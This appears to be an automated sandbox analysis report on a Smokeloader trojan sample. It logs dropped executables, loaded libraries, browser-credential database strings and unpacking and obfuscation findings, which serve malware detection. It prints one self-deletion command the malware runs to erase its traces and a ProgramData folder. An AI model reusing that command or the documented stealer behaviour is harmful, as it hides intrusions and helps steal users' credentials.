Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: aarhevh.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: aarhevh.2.dr Static PE information: Section .text
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section .text
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/35@4/9
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 13_2_6C9F0300
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007BE78E CreateToolhelp32Snapshot,Module32First, 5_2_007BE78E
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042B20E CoCreateInstance, 5_2_0042B20E
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\aarhevh Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\21AE.tmp Jump to behavior
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: katA304.tmp, katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 21AE.exe, 00000005.00000003.2359456032.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371853553.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2358592973.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2371430067.0000000002C96000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814035133.0000000000A29000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2830660684.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, HIDAFH.13.dr, BFHJJJ.13.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.13.dr, softokn3.dll.13.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe ReversingLabs: Detection: 55%
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Virustotal: Detection: 59%
Source: unknown Process created: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe "C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\aarhevh C:\Users\user\AppData\Roaming\aarhevh
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\21AE.exe C:\Users\user\AppData\Local\Temp\21AE.exe
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C9A7.exe C:\Users\user\AppData\Local\Temp\C9A7.exe
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmp
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: unknown Process created: C:\Users\user\AppData\Roaming\aarhevh C:\Users\user\AppData\Roaming\aarhevh
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\21AE.exe C:\Users\user\AppData\Local\Temp\21AE.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C9A7.exe C:\Users\user\AppData\Local\Temp\C9A7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Unpacked PE file: 5.2.21AE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Unpacked PE file: 5.2.21AE.exe.400000.0.unpack
PE file contains an invalid checksum
Source: sqls[1].dll.13.dr Static PE information: real checksum: 0x0 should be: 0x263795
Source: C9A7.exe.2.dr Static PE information: real checksum: 0x0 should be: 0x20fc0c
Source: aarhevh.2.dr Static PE information: real checksum: 0x16f83 should be: 0x14dc5
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: real checksum: 0x16f83 should be: 0x14dc5
Source: katA304.tmp.12.dr Static PE information: real checksum: 0x0 should be: 0xdfa9e
PE file contains sections with non-standard names
Source: sqls[1].dll.13.dr Static PE information: section name: .00cfg
Source: freebl3.dll.13.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.13.dr Static PE information: section name: .00cfg
Source: mozglue.dll.13.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.13.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.13.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.13.dr Static PE information: section name: .didat
Source: nss3.dll.13.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.13.dr Static PE information: section name: .00cfg
Source: softokn3.dll.13.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.13.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h 0_2_00401EB6
